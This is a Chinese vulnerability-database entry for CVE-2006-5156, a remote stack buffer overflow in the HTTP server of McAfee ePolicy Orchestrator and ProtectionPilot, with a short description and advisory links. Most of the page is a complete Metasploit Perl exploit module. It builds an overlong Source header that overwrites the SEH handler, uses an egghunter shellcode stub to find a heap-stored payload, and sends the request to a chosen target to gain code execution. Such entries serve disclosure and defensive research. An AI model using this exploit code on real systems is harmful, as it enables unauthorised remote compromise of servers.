McAfee EPolicy Orchestrator和ProtectionPilot HTTP Server远程缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111176 漏洞类型 缓冲区溢出
发布时间 2006-10-01 更新时间 2006-10-09
CVE编号 CVE-2006-5156 CNNVD-ID CNNVD-200610-071
漏洞平台 Windows CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/2467
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-071
|漏洞详情
McAeeSecurityePolicyOrchestrator是一款企业级反病毒管理工具。ePolicyOrchestrator及ProtectionPilot所带的HTTPServer在处理用户请求时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。ePolicyOrchestrator及ProtectionPilot在处理HTTP请求中的超长Source头选项数据时存在缓冲区溢出漏洞,远程攻击者可能通过超长的精心构造的数据溢出缓冲区执行任意指令。
|漏洞EXP
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::mcafee_epolicy_source;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };

my $info =
  {
	'Name'     => 'McAfee ePolicy Orchestrator / ProtPilot Source Overflow',
	'Version'  => '$Revision: 1.0 $',
	'Authors'  =>
	  [
		'muts <muts [at] remote-exploit.org>',
		'xbxice[at]yahoo.com',
		'H D Moore <hdm [at] metasploit.com>'
	  ],
	'Arch'  => [ 'x86' ],
	'OS'    => [ 'win32', 'win2000', 'win2003' ],
	'Priv'  => 0,

	'AutoOpts'  => { 'EXITFUNC' => 'thread' },
	'UserOpts'  =>
	  {
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The target port', 81],
		'SSL'   => [0, 'BOOL', 'Use SSL'],
	  },

	'Payload' =>
	  {
		# Space is almost unlimited, but 1024 is fine for now
		'Space'     => 1024,
		'BadChars'  => "\x00\x09\x0a\x0b\x0d\x20\x26\x2b\x3d\x25\x8c\x3c\xff",
		'Keys'      => ['+ws2ord'],
	  },

	'Description'  => Pex::Text::Freeform(qq{
	This is a stack overflow exploit for McAfee ePolicy Orchestrator 3.5.0 
	and ProtectionPilot 1.1.0. Tested on Windows 2000 SP4 and Windows 2003 SP1.
	This module is based on the exploit by xbxice and muts.
}),

	'Refs'  =>
	  [
		['URL', 'http://www.remote-exploit.org/advisories/mcafee-epo.pdf' ],
	  ],

	'DefaultTarget' => 0,
	'Targets' =>
	  [
		['Windows 2000/2003 ePo 3.5.0/ProtectionPilot 1.1.0', 96, 0x601EDBDA], # pop pop ret xmlutil.dll
	  ],

	'Keys' => ['epo'],

	'DisclosureDate' => 'Jul 17 2006',
  };

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Exploit {
	my $self = shift;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = $self->GetVar('RPORT');
	my $target_idx  = $self->GetVar('TARGET');
	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
	my $target = $self->Targets->[$target_idx];

	# Use a egghunter stub to find the payload
	my $eggtag  = Pex::Text::AlphaNumText(4);
	my $egghunt =
	  "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02" .
	  "\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8" .
	  $eggtag .
	  "\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7";

	# Create the 64-byte GUID
	my $guid = Pex::Text::AlphaNumText(64);

	# Create the 260 byte Source header
	my $evil = Pex::Text::AlphaNumText(260);

	#
	# A long Source header results in a handful of exceptions.
	# The first exception occurs with a pointer at offset 116.
	# This exception occurs because a function pointer is
	# dereferenced from the overwritten data and then called:
	#  naisp32!naSPIPE_MainWorkFunc+0x3ed:
	#    mov ecx, [eax+0x270] (eax is offset 116)
	#    push ecx
	#    call [eax+0x26c]
	#
	# When this happens, the first SEH in the chain is also
	# overwritten at offset 96, so the exception results
	# in our code being called. If we knew of an address
	# in memory that pointed to our shellcode, we could
	# avoid the SEH completely and use the above call to
	# execute our code. This is actually practical, since
	# we can upload almost arbitrary amounts of data into
	# the heap and then overwrite the function pointer above.
	#
	# This method is left as an excercise to the reader.
	#
	# This module will use the SEH overwrite with a pop/pop/ret or
	# a jmp/call ebx (2000 only) to gain control of execution. This
	# removes the need for a large data upload and should result in
	# reliable execution without the need to brute force.
	#
	# Since the SEH method only leaves ~140 bytes of contiguous
	# shellcode space, we use an egghunter to find the real
	# payload that we stuffed into the heap as POST data.
	#

	# Trigger the exception by passing a bad pointer
	substr($evil, $target->[1] + 20, 4, Pex::Text::AlphaNumText(3)."\xff");

	# Return to pop/pop/ret or equivalent
	substr($evil, $target->[1], 4, pack('V', $target->[2]));

	# Jump to the egghunter
	substr($evil, $target->[1] - 4, 2, "\xeb\x1a");

	# Egghunter has 140 bytes of room to work
	substr($evil, $target->[1] + 24, length($egghunt), $egghunt);

	# Create our post data containing the shellcode
	my $data = Pex::Text::AlphaNumText(int(rand(500)+32));

	# Embed the search tag and shellcode
	$data .= ($eggtag x 2) . $shellcode;

	# Add some extra padding
	$data .=  Pex::Text::AlphaNumText(int(rand(500)+32));

	my $req = "GET /spipe/pkg HTTP/1.0\r\n";
	$req .="User-Agent: Mozilla/4.0 (compatible; SPIPE/1.0\r\n";
	$req .="Content-Length: ". length($data). "\r\n";
	$req .="AgentGuid=${guid}\r\n";
	$req .="Source=${evil}\r\n";
	$req .= "\r\n";
	$req .= $data;

	$self->PrintLine(sprintf("[*] Trying ".$target->[0]." using 0x%.8x...", $target->[2]));

	my $s = Msf::Socket::Tcp->new
	  (
		'PeerAddr'  => $target_host,
		'PeerPort'  => $target_port,
		'LocalPort' => $self->GetVar('CPORT'),
		'SSL'       => $self->GetVar('SSL'),
	  );

	if ($s->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return;
	}

	$s->Send($req);

	$self->PrintLine("[*] Waiting up to two minutes for the egghunter...");
	$s->Recv(-1, 120);
	$self->Handler($s);
	$s->Close;
	return;
}

1;

# milw0rm.com [2006-10-01]
|参考资料

来源:VU#842452
名称:VU#842452
链接:http://www.kb.cert.org/vuls/id/842452
来源:BID
名称:20288
链接:http://www.securityfocus.com/bid/20288
来源:knowledge.mcafee.com
链接:http://knowledge.mcafee.com/SupportSite/search.do?cmd=displayKC&docType=kc&externalId=8611438&sliceId=SAL_Public&dialogID=2997768&stateId=0%200%202995803
来源:download.nai.com
链接:http://download.nai.com/products/patches/protectionpilot/v1.1.1/PRP1113.txt
来源:download.nai.com
链接:http://download.nai.com/products/patches/ePO/v3.5/EPO3506.txt
来源:MISC
链接:http://www.remote-exploit.org/advisories/mcafee-epo.pdf
来源:SECUNIA
名称:22222
链接:http://secunia.com/advisories/22222
来源:XF
名称:epolicy-source-header-bo(29307)
链接:http://xforce.iss.net/xforce/xfdb/29307
来源:OSVDB
名称:29421
链接:http://www.osvdb.org/29421
来源:VUPEN
名称:ADV-2006-3861
链接:http://www.frsirt.com/english/advisories/2006/3861
来源:SECTRACK
名称:1016971
链接:http://securitytracker.com/id?1016971
来源:SECTRACK
名称:1016970
链接:http://securitytracker.com/id?1016970
来源:FULLDISC
名称:20061002McAfeeEPOBufferOverf